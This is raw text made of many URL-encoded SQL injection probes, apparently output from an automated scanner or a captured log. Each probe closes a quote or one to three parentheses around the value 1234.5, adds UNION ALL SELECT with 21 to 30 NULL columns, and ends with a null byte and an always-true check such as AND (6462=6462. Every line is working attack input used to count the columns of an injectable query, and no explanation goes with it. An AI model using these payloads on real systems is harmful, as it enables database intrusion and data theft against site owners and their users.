1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286462%3D6462 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%288438%3D8438 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284234%3D4234 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286126%3D6126 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285176%3D5176 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%289091%3D9091 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286239%3D6239 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%289651%3D9651 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%287198%3D7198 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284908%3D4908 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%281617%3D1617 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%287650%3D7650 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282998%3D2998 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%285044%3D5044 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284292%3D4292 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%286402%3D6402 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%288374%3D8374 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%287140%3D7140 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%283508%3D3508 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%286975%3D6975 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%289989%3D9989 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281570%3D1570 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284542%3D4542 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284647%3D4647 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282964%3D2964 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281664%3D1664 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%285604%3D5604 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%287609%3D7609 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281811%3D1811 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%289936%3D9936 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27dfsw%27%3D%27dfsw 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27nTWU%27%3D%27nTWU 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27ZcNE%27%3D%27ZcNE 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27EtGj%27%3D%27EtGj 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27RJVs%27%3D%27RJVs 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Ccyn%27%3D%27Ccyn 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27wyEL%27%3D%27wyEL 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27xorW%27%3D%27xorW 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27bdHU%27%3D%27bdHU 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27YNTr%27%3D%27YNTr 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27agaW%27%3D%27agaW 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27cuBL%27%3D%27cuBL 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27prZV%27%3D%27prZV 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27YKWC%27%3D%27YKWC 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27JwoT%27%3D%27JwoT 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27uZUR%27%3D%27uZUR 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27cOAr%27%3D%27cOAr 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27qqGC%27%3D%27qqGC 